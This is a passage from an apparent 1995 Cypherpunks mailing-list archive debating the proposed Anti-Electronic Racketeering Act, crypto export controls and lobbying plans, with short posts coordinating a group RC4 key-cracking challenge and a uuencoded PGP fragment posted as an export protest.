case of electronically stored data, the seizure is >>incidental to >>an otherwise valid seizure, and the government officer or employee- >> >> ''(A) was not aware that work product material was among the data seized; >> >> ''(B) upon actual discovery of the existence of work product materials, the >>government officer or employee took reasonable steps to protect the privacy >>interests recognized by this section, including- >> >> ''(i) using utility software to seek and identify electronically >>stored data >>that may be commingled or combined with non-work product material; and >> >> ''(ii) upon actual identification of such material, taking reasonable steps >>to protect the privacy of the material, including seeking a search >>warrant.''. > >Eric Barnes - TheRogue at dnai.com >PO Box 27507, San Francisco, CA 94127 >Corporate Spokesman, Specialist in "Attack Public >Relations", Unique Marketing Solutions. >"You have to give up the life you planned, to find >the one that's waiting for you." - Sally Field Eric Barnes - TheRogue at dnai.com PO Box 27507, San Francisco, CA 94127 Corporate Spokesman, Specialist in "Attack Public Relations", Unique Marketing Solutions. "You have to give up the life you planned, to find the one that's waiting for you." - Sally Field From sebaygo at intellinet.com Thu Jul 13 22:10:48 1995 From: sebaygo at intellinet.com (Allen Robinson) Date: Thu, 13 Jul 95 22:10:48 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Ray Arachelian wrote: > On Thu, 13 Jul 1995, L. McCarthy wrote: > > > Mr. GRASSLEY. Mr. President, I rise this evening to introduce the > > Anti-electronic Racketeering Act of 1995. This bill makes important changes > > to RICO and criminalizes deliberately using computer technology to engage in > > criminal activity. I believe this bill is a reasonable, measured and strong > > response to a growing problem. According to the computer emergency and > > response team at Carnegie-Mellon University, during 1994, about 40,000 > > computer users were attacked. Virus hacker, the FBI's national computer > > crime squad has investigated over 200 cases since 1991. So, computer crime is > > clearly on the rise. > > Eh, what do "virus hackers" have to do with encryption, why is it these > morons justify the destruction of encryption by mentioning hackers and > viruses? The use of terms such as "virus" and "hacker" in a context such as this has little or nothing to do with what the terms actually mean. It's palpably obvious that they are being bandied about here solely for the knee-jerk emotional reactions they evoke. Even those more computer/net clue-impaired than Grassley (assuming that such is possible) know from watching TV and the movies that a virus is a Bad Thing (tm) and that hackers are evil! Pseudo-digital demagoguery. > Additionally, does this mean that someone outside of the USA is in danger > of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing > crypto software and publishing it in the open? After all, once it winds > up on some USA site, how do we know that someone outside the USA got his > copy of SuperDuperNSASpookFree from a non-US site? Just to be sure, > we'll bust both the site operator and nab the guy who wrote it next time > he drops in, or hell, we'll have him extradited. Or simply kidnap him and escort him back to the U.S. > > I believe we need to seriously reconsider > > the Federal Criminal Code with an eye toward modernizing existing statutes > > and creating new ones. In other words, Mr. President, Elliot Ness needs to > > meet the Internet. > > Where is Elliot Ness? I don't see any mafia.org on the net. Anyone here > see any such site? It might be even more beneficial if Senator Grassley and the other members of our august deliberative bodies would meet the internet. My gut reaction to the recent tide of legislation is that they are seeking to stangle what they fear and that they fear what they do not understand. (Too melodramatic?) > > Mr. President, I sit on the Board of the Office of Technology Assessment. > > That Office has clearly indicated that organized crime has entered cyberspace > > in a big way. International drug cartels use computers to launder drug money > > and terrorists like the Oklahoma City bombers use computers to conspire to > > commit crimes. > > Was it not proven that McVeigh and Co. >DID NOT< use a computer? THe AOL > account was a hoax, no? Where are the hoardes of anti-USA terrorists, > and drug pushers on the net? You don't recognize them because they are masquerading as "virus hackers". Again, the main reason for playing the "terrorist" card is for the emotional hot-buttons they can push by so doing. Since Grassley didn't use it, look for someone to introduce something this session titled, "The Avenge Those Poor, Innocent, Bloody Dead Children Act of 1995". AR %#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#% "Government is not reason... it is force. Like fire, it is a dangerous servant and a fearful master." - George Washington +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Allen Robinson...................................sebaygo at intellinet.com PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A From jpb at shadow.net Thu Jul 13 22:47:28 1995 From: jpb at shadow.net (Joe Block) Date: Thu, 13 Jul 95 22:47:28 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: re: >On June 27, Sen. Grassley introduced extensive criminal amendments to the >federal racketeering act. S. 974, the "Anti-Electronic Racketeering Act of >1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute), >18 USC 1030A (new section on computer crime), 18 USC 2515, 2516 >(wiretapping), and 42 USC 2000aa (Privacy Protection Act). This is a shining example of the Conservation of Tyranny. The former Soviet Union is becoming more free (with admittedly a few bumps in the road), so the US is becoming less so (with a few bumps such as the temporary defeat of Clipper). Sadly, this is only partially tongue in cheek. From adam at bwh.harvard.edu Thu Jul 13 22:47:32 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 13 Jul 95 22:47:32 PDT Subject: Fight, or Roll Over? In-Reply-To: <9507140301.AA13498@snark.imsi.com> Message-ID: <199507140547.BAA26040@bwh.harvard.edu> Perry writes: | watched and learned of indicates to me that there are enough people | and companies with an interest here to raise a few million | dollars. Consider that Netscape alone is a very wealthy company that | would have its marketing plans strongly disrupted by this new piece of | congressional trash. Sun is also a probable ally. John Gage (Sun's chief technical officer?) regularly slams the ITARs, as does CEO Scott McNealy. It would seem that those who don't write code should be out advocating the positive uses of cryptography, and looking for groups who can effectively fight this the way people normally fight bad legistlation in Congress. Petitions don't work. Spending piles of cash does. Writing code works even better. Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From tcmay at sensemedia.net Thu Jul 13 23:01:05 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 13 Jul 95 23:01:05 PDT Subject: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering) Message-ID: At 2:57 AM 7/14/95, L. McCarthy wrote: >> Perry, >> >> I have all I'm going to take of your acerbic rudeness to me. >> >> I will no longer be responding to any of your messages. >> >> --Tim > > > >Everybody needs to take a deep breath and count to 1,000. Seriously, >we're all feeling plenty of stress today. Various people have been >talking about getting out of the U.S. while the going's good (?), and >it doesn't sound much like hyperbole this time. It's not surprising that >we're releasing our frustration on each other, lashing out at the nearest >quasi-tangible targets. Note that I didn't post that to the list. Your requoting it, without the intermediate quoting of the person who _did_ post it to the list, makes it appear I was spewing this garbage to the list, when I wasn't. I don't care for your pop psychology. I would've followed your advice and left these comments in e-mail only, had you done the same. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From kelli at zeus.towson.edu Thu Jul 13 23:03:18 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Thu, 13 Jul 95 23:03:18 PDT Subject: Grassley: Lick my Gorton, Exon me all night long... Message-ID: I don't know if anyone has taken this into consideration: several people have noted that the anti-racket-whatever bill doesn't have too much chance of getting out of committee because its wording is a bit, well, broad. It's being reviewed by the Senate Judiciary committee. This is a problem for us, because Sen. Grassley is the chair of that committee. His e-mail address is chuck_grassley at grassley.senate.gov, fire away! Proud to be an Amurican, -=Kathleen M. Ellis=- "Buy your data, encrypt a rifle, and wait to be revolting..." -=The Book of Phil 7:1=- kelli at zeus.towson.edu http://zeus.towson.edu/~kelli/ GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11 From Piete.Brooks at cl.cam.ac.uk Thu Jul 13 23:08:08 1995 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Thu, 13 Jul 95 23:08:08 PDT Subject: Looks like "Cypherpunks Key Cracking Ring" is done ..... Message-ID: <"swan.cl.cam.:128710:950714060757"@cl.cam.ac.uk> I noticed that http://dcs.ex.ac.uk/~aba/percent.html was reporting: Percentage complete PERCENTAGE COMPLETE 4094 / 4096 = 100.6 percent which looked a bit odd to me :-) Do I detect a Pentium at work ?? Anyway, I grabbed a 29 bit address space and got: ffe0000000 29 THATS IT FOLKS! ALL DONE! and now it reports: Percentage complete PERCENTAGE COMPLETE 4096 / 4096 = 100.7 percent From kelli at zeus.towson.edu Thu Jul 13 23:31:00 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Thu, 13 Jul 95 23:31:00 PDT Subject: Grassley: correction Message-ID: Please disregard my post about Grassley being the chair of the senate Committee on the Judiciary; Orrin Hatch (Utah) is the chair. The number of the committee office is (202)224-5225. I'm sorry for the misinformation--hope it didn't cause to much frustration. -=kathleen m. ellis=- "Buy your data, encrypt a rifle, and wait to be revolting..." -=The Book of Phil 7:1=- kelli at zeus.towson.edu http://zeus.towson.edu/~kelli/ GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11 From stewarts at ix.netcom.com Thu Jul 13 23:31:57 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 13 Jul 95 23:31:57 PDT Subject: Message-ID: <199507140628.XAA21517@ix3.ix.netcom.com> At 02:57 PM 7/13/95 -700, Kevin Stumborg wrote: >send me mail Here's some! You might try sending mail to cypherpunks-request at toad.com (or majordomo at toad.com) with a one-line message body saying help # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Thu Jul 13 23:33:00 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 13 Jul 95 23:33:00 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507140629.XAA21600@ix3.ix.netcom.com> At 04:53 PM 7/13/95 -0400, Ray Arachelian wrote: >> Mr. GRASSLEY. Mr. President, I rise this evening to introduce the >> Anti-electronic Racketeering Act of 1995. This bill makes important changes >> to RICO and criminalizes deliberately using computer technology to engage in >> criminal activity. I believe this bill is a reasonable, measured and strong >> response to a growing problem. According to the computer emergency and >> response team at Carnegie-Mellon University, during 1994, about 40,000 >> computer users were attacked. Virus hacker, the FBI's national computer >> crime squad has investigated over 200 cases since 1991. So, computer crime is >> clearly on the rise. > >Eh, what do "virus hackers" have to do with encryption, why is it these >morons justify the destruction of encryption by mentioning hackers and >viruses? You're parsing the title wrong. It's an act to support racketeering through opposition to electronic communications. What viruses have to do with encryption is that encryption makes it easier to prevent viruses, and Senator Grassley wants to stop that. And the term "strong" was used in its correct engineering meaning, as in "It's a vessel of fertilizer which is very strong and promotes growth". >> Mr. President, I suppose that some of this is just natural. Whenever man >> develops a new technology, that technology will be abused by some. And that >> is why I have introduced this bill. Yup. Quite so. >> Computer fraud accounts for the loss of millions of dollars per year. And >> often times, there is little that can be done about this because the computer >> used to commit the crimes is located overseas. So, under my bill, overseas >> computer users who employ their computers to commit fraud in the United >> States would be fully subject to the Federal criminal laws. Hey, Julf, we've got your number! And we're making sure nobody's got any encryption to prevent fraud with. >> Mr. President, this brave new world of electronic communications and global >> computer networks holds much promise. But like almost anything, there is the >> potential for abuse and harm. That is why I urge my colleagues to support >> this bill and that is why I urge industry to support this bill. As above. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Thu Jul 13 23:47:07 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 13 Jul 95 23:47:07 PDT Subject: Encryption and ITAR Message-ID: <199507140645.XAA12031@ix4.ix.netcom.com> At 05:30 PM 7/13/95 EST, It's supposed to crash like that. wrote: >Anyone know how far ITAR reaches? Is there a list of programs that are illegal >to take from america anywhere else? My company does a LOT of buisness (80%) >outside the US, and I wonder if they are maybe pissing off the NSA or somthing >with some software they take with them. (a DES encrypter, and some other >encryption stuff) It's the other way around. Anything that does encryption that they _haven't_ explicitly given you permission to export, or that isn't subject to subtle and arguable interpretations of the law (or blatantly obvious interpretations of the First Amendment) is verboten. So buy your crypto stuff overseas, and import it, and write letters to your COngresscritters about how annoyed you are that you have to do this. Might as well send them a bill for the extra expenses you've had to incur; they won't pay it, of course, but it should amuse some of the Republicans.... # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From silversh at rmii.com Fri Jul 14 00:14:12 1995 From: silversh at rmii.com (Mark Silversher) Date: Fri, 14 Jul 95 00:14:12 PDT Subject: The MoJo Wire thanks you In-Reply-To: Message-ID: Please unlist me. On Thu, 13 Jul 1995, Joel B. Truher wrote: > Thank you for your help in our beta test! Please come back soon, > and send me mail if you'd like to be removed from this mailing > list -- we may send a new Web product announcement every few months, > and you'll soon receive a survey of your opinion of our site. > > More info on The MoJo Wire: > > > "More fun than a secret decoder ring!" > -- Jim Hightower > > "Mother Jones magazine is turning the tables [on Gingrich]" > -- LA Times > > Mother Jones is pleased to announce the official release of our > redesigned WWW site, now called The MoJo Wire, on July 14th, at: > > http://motherjones.com > > * See Newt Gingrich's secret list of major funders on our "Coin- > Operated Congress" feature. Gingrich is fighting the FEC in > court to keep this information secret, but you can see it here > for the first time. See the ten worst, the ten richest, the > dirt on all of them, and help complete this interactive > investigation project. > > * Newly revamped on-line chat software, called Live Wire, > provides the best Web-based political discussions anywhere. > Create hyperlinks in the words of others in this new feature, > which already contains several lively debates. > > * The July/August issue of Mother Jones magazine is available > only on The MoJo Wire. Read the full text of the magazine. > > Many thanks to our team of two thousand beta testers! With your > help, we've worked a few of the last kinks out of the system, > added a few things, and now offer the service password-free. > > For more information about The MoJo Wire, send mail to > truher at mojones.com, or call me at 415-665-6637. > > Joel Truher > Manager, The MoJo Wire > > From tj at compassnet.com Fri Jul 14 00:25:57 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Fri, 14 Jul 95 00:25:57 PDT Subject: Crisis Overload (re Electronic Racketeering) Message-ID: Perry Metzger wrote: >"Robert A. Hayden" writes: >> We've seen the enemy, that the are the 535 senators and representatives >> in D.C., and the staff in the White House. It's time to shore up our >> allies and enter the battle witht he best weapons we have; information >> and popular use. > >As unpleasant as the congress is, it isn't the enemy. The governmental >forces desiring control are not the same as the congress. This is true. IMNSHO we are witnessing yet another case of the representation of an illegitimate constituency. Grassley is not representing the people of his state -- he is representing and carrying water for federal government interests. While some people used to acidly refer to "The Senator from Texaco" and such, it is a much more common situation that some Senators and Representatives represent federal agencies in matters before their chamber that virtually NO VOTER would ever think of or could even discover as a matter of personal interest. You can be sure Cathy Cornflower of Cherokee didn't start this by writing Grassley and suggesting that RICO be expanded to cover distribution of non-GAK crypto. It is inconceivable that more than a tiny handful of Grassley's constituents would even recognize anything in his bill if stopped on the street and asked about it. Agencies develop "friendly" congresscritters like the Soviets used to develop "friendly" journalists and politicos. It wouldn't even be all that surprising if similar methods are used. The "friendlies" take obscure and no-so-obscure issues before their house on behalf of the agencies. At some level this is probably necessary, but with all those folks getting comfy with each other up there in Disneyland-on-the-Potomac, it's impossible that unholy alliances do not develop. The "us vs them" mentality of a congresscritter grows to encompass all three branches under "us" and views the unwashed masses as "them." In that view the suit from XYZ who comes over to confer with the staffers is "one of us." He gets right in (while visiting constituents wait stupidly for an appointment that the elected official will be -- we're so sorry -- unable to keep). He's bringing up an issue of concern to "us." "We" have a problem that needs to be fixed by modifying para (a) of sec (3) to read "shall" instead of "may." "We" will feel very important and may even win some special stroking or quid pro quo for fixing "our" problem. The one real flaw in this is that the electorate was just left out of the loop, and kept in the dark to boot. When the elected official went into "we" mode he ceased representing the people who sent him there. In these increasingly totalitarian times it's likely his representation was distinctly CONTRARY to the interest of those who sent him there. There have been cases of agencies approaching "their" congressman and having completely new language inserted in a conference bill -- language that was never in the original, never offered as an amendment until the bill from each house went to conference, and never debated when the conformed bills returned for final vote. It's the norm that such maneuvers go completely unreported in the media. >Congressmen are by and large harried and ignorant people. They have no >idea what any of this is about. We have the choice of letting Louis >Freeh do all the educating, or having a white shoe Washington PR firm >do some of the educating, too. I favor the latter approach. There is also something that is almost always overlooked... taking names. It is possible to "pull on the string" and follow the visible event back to the less immediately visible actors. The congresscritters, though by and large harried and ignorant, are not always guiltless. At best they are willing agents for little bits and pieces of the fabric of overweening statism. In every case, though, there are faceless staffers who may also be harried but are usually NOT ignorant. The staffers are often the ones who "sell" the congresscritter on signing onto this or that non-voter issue for this or that self-serving political reason. Staffers also include the people with huge political axes to grind -- people who gravitate to the positions of writing the text of the bills that translate the generality to which the elected official has acceded into excruciatingly detailed and usually confusing legislative language. There's a relatively small number of really activist people in government, and not all of them are public and visible. It's possible that some congresscritters could be defeated with the aid of dissemination back home of information on the non-voter issues they've championed and concise explanations of how many of those issues work to harm their voters. It's also possible that some of those faceless staffers could be turned into liabilities by focusing some light on them, thereby reducing their effectiveness and employability. >This is not to say that we shouldn't be widely deploying crypto -- we >should. (Of course, offshore sites will always have crypto available, >but...) It would seem that the U.S. may lose a number of good minds who may prefer to live and write code in other parts of the world. This has been a developing trend for other reasons, and now people who like to write crypto will have another reason to look for a new home. >This is also not to say that Congress doesn't pass very bad laws. Name a good one! >However, I very, very strongly urge that we not assume that nothing >can be done. Just winning a couple years time could totally alter the >landscape. Your urging is appropriate. It's odd, though, how the country seems to be pulling itself in two diametrically opposed directions: On the one hand the electorate shifted significantly in the '94 election, responding with greater enthusiasm than even the new young Turks in Congress seem to fully comprehend, and seeming to be fed up with too much government, prepared to commission the dismantling of federal bureaucracy and getting government the hell out of their lives. On the other hand we see bold and impressive moves on the part of politicos and bureaucrats toward a suffocating, draconian 1984 police state. We have even heard increasing choruses of "Just following orders" and "Just doing my job" from mindless hatchetmen these last few decades -- bizarre and incredible echos of the excuses offered in post-WWII war crimes defenses. The country cannot move strongly in these two directions for long: Something has to give. The longer this division persists, the greater the gulf that stretches between and the more "interesting" the times that will result when one side prevails. The side that prevails will consume the side that fails with an intensity related to the energy built up in the process. Crypto is presently on the periphery of the larger schism, though it's conceivable that twenty years in the future it would be clearly understood by most people to be central to privacy in an information age. The moves to head crypto, and thus privacy, off at the pass are being made now, though, in an effort to prevent a future in which large numbers of people understand how to maintain privacy when everything is a bit stream. If there is a critical and unique difference between this and other seemingly similar situations it is the 10-15% monthly growth of the Internet, something that is orders of magnitude greater than what humans are accustomed to perceiving, estimating, handling, coping with. If recent figures are accurate, 7,500+ new web pages have been created in the 33 hours since this thread started here and perhaps 100,000 new people are on the net in one way or another. It's unlikely that Grassley or Exon or Leahy can assimilate all the implications of that rate of growth. "Senator, the blob is at the door!" "Well, call the State Police!" "Uh, sir, they're at least three hours away. In that time the blob will be larger than the State of Idaho!" The politicos have never before dealt with a sizable "throwaway minority" whose current growth curve intersects the U.S. population curve in 24 months and the world population curve in 4 years. In a couple of days there are more new people getting on the net worldwide than are contained in a U.S. congressional district. Partly as a result, there are issues getting attention that would have easily been contained just a couple of years ago by the policy of benignly overlooking them. No longer. If a net mobilization was disappointing last month, try it this month and see the difference. Movements that took years to form and grow decades ago take days or weeks now. Soon they will take only hours. We are just now cresting the big one on the supercharged roller coaster of high tech infoplosion, and as the velocity rapidly builds there will be profound shock among the old and the slow. Even the savvy will be surprised. Push this medium for all it's worth. Find ways to promote informed privacy as a ground-floor issue for newbies and get them to have a knowledgable, vested interest in it. Get people onto the net. One new person today is four or five people a year from now, 15-28 people two years from now. Since a lot of it spreads from person to person, new people start with tools and concepts they get from others, so the initiation of a new netparticipant as a privacy-aware crypto user tends to spawn subtrees of new users in the same mode. Use the growth multiplier to outflank 'em while they're noodling. Would it be more productive to hire the white shoes or start another few ISPs and shepherd the new users to be privacy-aware letter writers and faxers? Educate your ISPs. Any ISP that isn't political in this age is brain dead and dead weight. Any ISP that sees its political interests as somehow different than those of its users (recent lobbying to shift burdens away from national services and onto users, and recent AOL admissions of participation in what sounded like entrapping users) is worse than brain dead -- it's part of the problem. Bolivar From kwang at blackbox.punk.net Fri Jul 14 00:34:52 1995 From: kwang at blackbox.punk.net (Kevin Wang (The Scarecrow)) Date: Fri, 14 Jul 95 00:34:52 PDT Subject: RC4 - I grabbed too much keyspace Message-ID: <199507140732.DAA08254@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Due to a misunderstanding on my part, I grabbed too much key space. Here's one contiguous block that needs to be worked on: 9 1a80000000 31 10 1b00000000 31 11 1b80000000 31 12 1c00000000 31 13 1c80000000 31 14 1d00000000 31 15 1d80000000 31 16 1e00000000 31 17 1e80000000 31 18 1f00000000 31 19 1f80000000 31 20 2000000000 31 21 2080000000 31 - Kevin Wang, kwang at lore.acs.calpoly.edu - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAYdXioZzwIn1bdtAQHgRgF/dsbrZ2oYofdm52KX8QsAOlg+Seiw2cXO 1P3p0HBbDW7Ukyyyv1UphZkrD7JQsDJP =m+pJ -----END PGP SIGNATURE----- From kelli at zeus.towson.edu Fri Jul 14 01:12:44 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Fri, 14 Jul 95 01:12:44 PDT Subject: Cypherpunks Lobbying? In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Timothy C. May wrote: > > I'd hardly call my view "throwing in the towel." What I said clearly enough > was that the Washingtonians can throw out repressive legislation much > faster than we can--and I speak in terms of "we" as being the EFF, EPIC, > NRA, ACLU, etc., and _not_ the Cyherpunks, who have no lobbying activities > to speak of. I'm glad you brought this up, Tim, because Pat Farrell, Carl Ellison, and I have been discussing the possiblility of doing just that over the past week or so. The three of us, in addition to many others (we like to call ourselves "The Mid-Atlantic Cypherpunks") are very near DC and thought we might take advantage of this on behalf of others who don't have the luxury of living near their legislators. Our idea (and it was originally limited to lobbying against the CDA, but we can expand it now to lobby against that and S.974) was to have Cypherpunks send letters (yes, authentic _snail mail_) to a Cypherpunk willing to go deliver it in person, (namely me) and talk to whoever is there, be it the congressperson or one of his/her aides. The strategy of this action would be to say,"hello, we represent and we oppose and we feel this way because and here is a letter from one of your constituents who feels the same way we do." A simple lobby. I thought this might be effective because it seems that a lot of representatives are difficult to get in touch with, since not all of them have e-mail addresses. I think there is a certain advantage in this kind of action from an educational standpoint, considering that the House doesn't seem to have a strong backer for this bill like the Senate did, and the many Congresscritters who know nothing about the net only need someone to explain the consequences of such a bill to them. Furthermore, to those ignorant of the net and its ways, a printed out list of names and e-mail addresses collected through the web is completely foreign and perhaps intimidating to them, and therefore not all that helpful to us, IMHO. Hand-signed letters (or hand-written, if your printing is more legible than mine) in good, old-fashioned envelopes is just what critters of this sort need to see. If any US citizens here would like me (and hopefully some older, wiser cypherpunks willing to join me on this trip) to deliver a letter to their congressperson please send a letter to this address: The Hon. Whoever c/o Kathleen M. Ellis TSU box 898 Towson State University 8000 York Road Towson, MD 21204 On the envelope you must include: The name of the congressperson (if I have to open the letter to be able to tell who it is meant for it'll lose some of its authenticity) My full address (yes, all five lines of it, or i'll never get it) If you can get it, the office location of representative (building name and room number) printed on the back or something, if you can't find it don't worry, I'll find it, but if you can find it I'd appreciate it. You can get it at the URL below. A return address A postmark from your district The letter must have: The specific bill you are against; its number, title, and sponsors (the CDA is H.R.1004/S.652 sponsored by Senator James Exon, from Nebraska) Possible alternatives (my suggestion is H.R. 1978, sponsored by Cox and Wyden) A polite introuduction, a concise body, and a gracious conclusion :). Your address and signature. If you need more information for your letter, good URLs on the subject are: http://www.cdt.org/cdw.html http://www.cdt.org/petition.html http://www.eff.org/pub/EFF/Issues/censorship/Exon_bill/ http://uvacs.cs.virginia.edu/~hwh6k/public/S314_stuff.html http://www.phantom.com/~slowdog http://www.panix.com/vtw/exon/ If you don't know who your representative is, try to find her/him through http://www.house.gov and look for a familiar looking name from your state. Unfortunately there's no "point-and-click" US map to refer to to find out which district is yours, but you should be able to find out fairly easily by looking for familiar names. If you really get stuck, try your local League of Women Voters. The main thing is, I need these letters soon. In order to have a shot at getting to talk to anyone, I must make appointments with the offices of the respective representatives. The house is expected to vote on this topic any day now; the clock's a-ticking. I ask that all letters be sent so that I can recieve them by July 23rd. I aim to raid congress on Tuesday, July 25th. This date could be changed, depending on the definite responses I get from people willing to help. I have lobbied before, and I'm up to the task, but it would be nice to have some other politically-oriented cypherpunks along for, at the very least, moral support. Anybody interested, Please Please Please send me some e-mail. Carl or Pat might go, and if we get enough people to help we can split the workload among teams. If anyone has comments/questions/suggestions, don't hesitate. I'd appreciate whatever isn't necesary to go up on the list to be sent to me privately, so's I don't get into trouble for "inciting spam". -=Kathleen M. Ellis=- kelli at zeus.towson.edu http://zeus.towson.edu/~kelli/ GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11 From sameer at c2.org Fri Jul 14 01:44:50 1995 From: sameer at c2.org (sameer) Date: Fri, 14 Jul 95 01:44:50 PDT Subject: c2.org now offers telnet-only accounts Message-ID: <199507140842.BAA06740@infinity.c2.org> "The Premier Cypherpunk ISP" now offers shell accounts at a discount to those who will just telnet in and not use the dialup pool. We are one of the only ISPs in the country who offers anonymous shell accounts. (Payment in advance, of course.) Check out http://www.c2.org If you think our net is too slow right now, check back in about a month. ("Premier Cypherpunk ISP" is a bit of a joke, btw) -- sameer Voice: 510-601-9777 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From gds at connex.com Fri Jul 14 02:06:58 1995 From: gds at connex.com (David Scoggins) Date: Fri, 14 Jul 95 02:06:58 PDT Subject: Anti-Electronic Racketeering Act of 1995 In-Reply-To: <199507131932.PAA01245@bb.hks.net> Message-ID: According to Shari Steele: > Fortunately, the bill does not have a very promising future. The bill has > no co-sponsors. It was immediately referred to the Committee on the > Judiciary, where it currently sits. LEXIS's bill tracking report only > gives it a 10% chance of passing out of the committee. Thank God, if true. After lurking on this list for a couple of months, I finally feel motivated to comment by this latest bout of official stupidity. I realize that I am preaching to the choir here, so if you don't need any more convincing, feel free to delete this now. And for those readers not in the US - pray pardon the US-centric tone of this piece. I have been steadily lowering my opinion of the human race for 20 years now. It is depressing to realize that I may have to ratchet it downward another notch or two. That our various elected representatives and assorted civil masters are stupid, venal, corrupt, short-sighted, incompetant, arrogant, foolish, greedy, megalomaniacal, immoral poltroons with the manners of billy goats utterly lacking in common sense or common decency no longer surprises me. What does still surprise me is just *how* stupid, venal, corrupt, etc they really are. If we can not govern ourselves better than this, then we really are just overgrown chimpanzees. And our cousin primates should probably feel insulted by the comparison. The United States used to be a special place, and I used to be proud of being a citizen of this country. Sadly, this is no longer true. Our government, in all three of its branches and its multiplicity of agencies, bureaus, departments and services, has made a mockery of the Constitution. The Ninth and Tenth Amendments are laughed at, the Fourth and Fifth Amendments are in tatters, the Second is under incessant attack, and the First... well, the First Amendment to the Constitution of the United States is basically being gang-raped by Congress as we speak. Consider those words, "as we speak". Clearly, I consider what I am doing now to be "speech". It is not face to face, I am not in the presence of all of you in one place at one time speaking these words aloud - but it is still speech. Most of you who read this, perhaps all of you, will agree, I think. What we do on the 'net - in email, in Usenet, in irc - is communication between human beings - fundamentally, speech. It is obvious to us that speech, regardless of medium, should be protected by the First Amendment. Equally obvious, many in Congress, the Administration and the Federal Courts disagree. The courts, and in particular the Supreme Court have by a process of straining at gnats and swallowing camels "interpreted" the Constitution in such a way as to permit clearly unconstitutional laws and practices to continue. They are wrong, but so what. The knowledge that you are wholly right and that your opponents are wholly wrong is of small comfort when the noose is around your neck. Many Americans now actively fear the Federal government and its Law Enforcement Agencies, and justly so. Every day more evidence emerges of profound and widespread abuse of power, corruption and official arrogance on the part of the LEAs, yet many of our Senators introduce and vote for legislation that would severely weaken the precious few remaining restraints on their power, and grant them even broader and ever more sweeping powers to invade the privacy and abridge the rights of American citizens. The United States used to be special. It was founded by people who believed that human beings had rights that were *not* simply privileges granted by the state, but were innate and could *not* be taken away. (Or at least you did as long as you were an adult white male property owner.) They believed that governments had no powers unless they were granted by the people, not the other way round. In short, they believed in the principles and philosophy outlined in the Declaration of Independence. This is no longer the case. Two hundred and nineteen years later, we pay lip service to the ideals of the Declaration every July Fourth, but the last person in Congress who paid any attention to those ideals was apparently Barry Goldwater. Let us be realistic for a moment. Consider this a half-hearted apologia for Senator Grassly, if you will. France already bans crypto, modulo some exceptions that I believe are rather hard to qualify for. And I consider a judicial system based on the Napoleonic Code reprehensible. Yet by all accounts France remains a tolerable and decent place to live. Without irony, most people refer to France as part of the Free World. The UK, Canada and Australia have censorship laws, Official Secrets Acts and the like that permit prior restraint of publication and other things that we Americans find distressing. Yet I 